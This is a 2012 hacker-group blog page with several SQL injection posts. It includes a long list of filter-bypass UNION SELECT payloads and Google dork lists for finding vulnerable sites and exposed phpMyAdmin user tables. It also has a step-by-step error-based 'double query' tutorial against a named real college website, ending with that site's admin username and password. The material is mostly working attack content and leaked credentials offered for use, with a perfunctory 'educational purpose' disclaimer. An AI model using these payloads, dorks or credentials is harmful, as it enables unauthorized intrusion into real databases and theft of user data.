Showing posts with label Sql Injection. Show all posts
Showing posts with label Sql Injection. Show all posts

Saturday, September 8, 2012

ALL Bypass SQL Injection

Author    : Cep Engking
Thanks to : All Khorasan CyberArmy & Rob0t Pirates Member
Special to: CyberCode Khorasan, JinCorn, An0nym0uZ-17, cliZAceh, Hitcher, CFR, Zqor, TOr Demon, Dr Ninja



@Bypass_Method_7_1 = (" union select version(),2,3,4,5,6,7--", "+union+select+version(),2,3,4,5,6,7--", "\'+union+select+version(),2,3,4,5,6,7--", "/**/union/**/select/**/version(),2,3,4,5,6,7/**/", "/*+*/union/*+*/select/*+*/version(),2,3,4,5,6,7/*+*/", "/**/union/**/select/**/all/*!50000select*/version(),2,3,4,5,6,7/**/
", "%20and%20%28select%201%29%20=%20%28select%202%29%20union%20all%20select%20version%28%29%206%207%202%203--", "+and (select 1) = (select 2) union all select version(),2,3,4,5,6,7--", "%20and%20%28select%201%29%20=%20%28select%200x4141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141%29%20union%20all%20select%20version%28%29%206%207%202%203%204%205%206%207--", "and (select 1) = (select 0x4141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141) union all select version(),2,3,4,5,6,7--", "**/uNiOn/**/SElEcT/**/vErSiOn(),2,3,4,5,6,7/**/", "/**/union/**/select*/version(),2,3,4,5,6,7--", "/**/union/**/select*/(0x76657273696f6e2829),2,3,4,5,6,7/**/", "/*!unIOn*/ select version(),2,3,4,5,6,7--", "/*--*/union/*--*/select/*--*/version(),2,3,4,5,6,7/*--*/", "%09union%09select%09version(),2,3,4,5,6,7--", "%0aunion%0aselect%0aversion(),2,3,4,5,6,7--", "%0dunion%0dselect%0dversion(),2,3,4,5,6,7--", " union select \@\@version,7,2,3,4,5,6,7--", "+union+select+\@\@version,7,2,3,4,5,6,7--", "\'+union+select+\@\@version,7,2,3,4,5,6,7--", "/**/union/**/select/**/\@\@version,7,2,3,4,5,6,7/**/", "/*+*/union/*+*/select/*+*/\@\@version,7,2,3,4,5,6,7/*+*/", "/**/union/**/select/**/all/*!50000select*/\@\@version,7,2,3,4,5,6,7/**/", "%20and%20%28select%201%29%20=%20%28select%202%29%20union%20all%20select%20%40%40version%206%202%203%204%205%206%207--", "+and (select 1) = (select 2) union all select \@\@version,7,2,3,4,5,6,7--", "%20and%20%28select%201%29%20=%20%28select%200x4141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141%29%20union%20all%20select%20%40%40version%206%202%203%204%205%206%207--", "and (select 1) = (select 0x4141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141) union all select \@\@version,7,2,3,4,5,6,7--", "**/uNiOn/**/SElEcT/**/\@\@version,7,2,3,4,5,6,7/**/", "/**/union/**/select*/\@\@version,7,2,3,4,5,6,7--", "/**/union/**/select*/(0x404076657273696f6e),2,3,4,5,6,7/**/", "/*!unIOn*/ select \@\@version,7,2,3,4,5,6,7--", "/*--*/union/*--*/select/*--*/\@\@version,7,2,3,4,5,6,7/*--*/", "%09union%09select%09%40%40version%206,2,3,4,5,6,7--", "%0aunion%0aselect%0a%40%40version%206,2,3,4,5,6,7--", "%0dunion%0dselect%0d%40%40version%206(),2,3,4,5,6,7--", "+UNion+SeleCT+verSion(),2,3,4,5,6,7--", "+uUniOn+SeLeCt+veRsion(),2,3,4,5,6,7--", "+unION+SeLecT+VersiOn(),2,3,4,5,6,7--", "+UNION+SELECT+VERSION(),2,3,4,5,6,7--");

Wednesday, September 5, 2012

SQL Dork by Cep Engking

Author    : Cep Engking
Thanks to : All Khorasan CyberArmy & Rob0t Pirates Member
Special to: CyberCode Khorasan, JinCorn, An0nym0uZ-17, cliZAceh, Hitcher, CFR, Zqor, TOr Demon, Dr Ninja


inurl:group_concat username 0x3a PASSWORD from robot
inurl:group_concat username 0x3a PASSWORD from pirates
inurl:group_concat username 0x3a PASSWORD from obama
inurl:group_concat username 0x3a PASSWORD from shadow
inurl:group_concat username 0x3a PASSWORD from khan
inurl:group_concat username 0x3a PASSWORD from paul
inurl:group_concat username 0x3a PASSWORD from pakistan
inurl:group_concat username 0x3a PASSWORD from hacker

inurl:group_concat username 0x3a PASSWORD from users
inurl:group_concat username 0x3a PASSWORD from adm
inurl:group_concat username 0x3a PASSWORD from admin
inurl:group_concat username 0x3a PASSWORD from user
inurl:concat username 0x3a password from sysibm.sysdummy1
inurl:concat username 0x3a password from israel
inurl:concat username 0x3a password from mr.bean
inurl:concat username 0x3a password from sysuser
inurl:concat username 0x3a password from sysadmin
inurl:/MyBB/Upload/inc/
inurl:db_mysql.php
inurl:sql.php?table=wp_users
inurl:sql.php?table=group
inurl:sql.php?table=phpMyAdmin
inurl:sql.php?table=users
inurl:sql.php?table=login
inurl:/phpMyAdmin/sql.php
inurl:sql.php?table=customer
inurl:sql.php?table=member
inurl:sql.php?table=account
inurl:sql.php?table=admin
inurl:sql.php?table=tblwhoislog
inurl:/usr/local/apache/htdocs
inurl:sql.php?table=jos_users
inurl:sql.php?table=mybb_users
inurl:sql.php?table=log
inurl:sql.php?table=pass
inurl:sql.php?table=information_schema
inurl:sql.php?table=proxies_priv
inurl:sql.php?table=mysql.user
inurl:sql.php?table=collection
inurl:sql.php?table=loginlog
inurl:sql.php?table=menu
inurl:sql.php?table=setting
inurl:sql.php?table=phpbb_users
inurl:/phpmyadmin/sql.php?db=mysql&sql_query=
inurl:union+select+filetype:asp
inurl:union+select+filetype:php
inurl:union+select+filetype:cfm

inurl:union 4.1.22-standard-log
inurl:union 5.0.67-log
inurl:union» 4.1.22-log
inurl:union 5.0.32
inurl:union» 5.0.67
inurl:union» 5.0.51a-3ubuntu5
inurl:union» 5.1.63-cll
inurl:bootstrap.php
inurl:Host:+filetype:sql
inurl:phpMyAdmin running on localhost - phpMyAdmin 2.5.7-pl1

Tuesday, July 24, 2012

Double Query Injection Tutorial By Reaper Grim

        ~ Starting with the Name of Almighty ALLAH~
                 Asalam-u-alaikum
==================================================================
             Note: For Educational Purpose

# Double Querry Injection
# http://robotpirates1337.blogspot.com
# Reaper Grim (cb0t) Robot Pirates

# The Game is Not yet Over !
==================================================================


# Target :http://www.ksrmce.ac.in/

# Vuln link: http://www.ksrmce.ac.in/departments/department.php?id=9

# First Lets see Simple Injection i mean Lets Use Order by

# Now Use Union and By Using Union we get this Error
(The used SELECT statements have a different number of columns)

# This means We have to use Double Querry or Heavy Querry injection

# Lets Start

1) First Current database name for this Use this Querry

+and(select 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

# here "Duplicate entry 'ksrmce_ksrmDB1' for key 'group_key'"

2) Now Version Just Change [database()] to [version()]
# "Duplicate entry '5.1.61-cll1' for key 'group_key'"

Note: You Can get Hostname,Datadirectory by Replacing version() with
this

# Hostname= @@hostname=Duplicate entry 'cpanel23.interactivedns.com1' for key 'group_key'
# Datadirectory= @@datadir=Duplicate entry '/var/lib/mysql/1' for key 'group_key'

3) Now lets see How many tables are in the Database

+and(select 1 FROM(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

# "Duplicate entry '~'22'~1' for key 'group_key'" [22 tables]

4)Now lets Get tables from database ;)

+and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

# First Table "Duplicate entry '~'tbl_announcement'~1' for key 'group_key'"

Now Change the Limit just watch Closley change the Limit Where we see

[table_schema=database() LIMIT 2,1] By Changing limits we can get Tables

Note : Sorry i don't have time so I just skip one by one Table
finding

5) Now Lets get Data from Tables

#  "tbl_users" Hex it and Follow me ;)
    "0x74626c5f7573657273"

+and(select 1 FROM(select count(*),concat((select (select (select distinct concat(cast(column_name as char)) FROM information_schema.columns WHERE table_schema=database() AND table_name=0x74626c5f7573657273 LIMIT 0,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

# Column Name = Duplicate entry 'US_ID1' for key 'group_key'[US_ID]

 Now Again Change the Limit Where we changed before ^_^

#Duplicate entry 'US_LOGINID1' for key 'group_key'[US_LOGINID]
#Duplicate entry 'US_NAME1' for key 'group_key'[US_NAME]
#Duplicate entry 'US_PASSWORD1' for key 'group_key' [US_PASSWORD]

6) Now the Last Step ;)  Get Data from "tbl_users" By Using this

+and+(select 1 FROM(select+count(*),concat((select(us_name) FROM tbl_users+LIMIT+0,1),floor(rand(0)*2))x FROM information_schema.tables+GROUP BY x)b)
# Username=admin
# UserPass=narayan2bathula1

I hope U guys Learn Something From it ^_^

================================================================


                          Greetz
~ ~L1nux3rr0r ~ PhpBuGz ~ H4x0rl1f3 ~ Hitcher ~ Shadow008 ~
                      Special Love to
         ~ Cfr ~ Dr Ninja ~ Zq@r ~ Cos b0t

          All All Rob0t Pirates & Madleets members ;)
                        ./reaper






SQL Dork by Khorasan CyberArmy

inurl:group_concat username 0x3a PASSWORD from users
inurl:group_concat username 0x3a PASSWORD from adm
inurl:group_concat username 0x3a PASSWORD from admin
inurl:group_concat username 0x3a PASSWORD from user
inurl:concat username 0x3a password from yahoo
inurl:concat username 0x3a password from israel
inurl:concat username 0x3a password from mr.bean

dork sql very fast
inurl:totalqueries=0

dork sql very fast
inurl:table_schema=database()--

Thankx Khorasan CyberArmy For This Gift <3 :)

SQL Injection Tutorial by Zq@r From Rob0t Pirates

Salam to All
1st all i want to say Happy Birthday Cfr :) My Lovely Brother

This vedio will be little help for new hackers

Greetz specially To "  Cfr & Robot Pirates Team


Enjoy!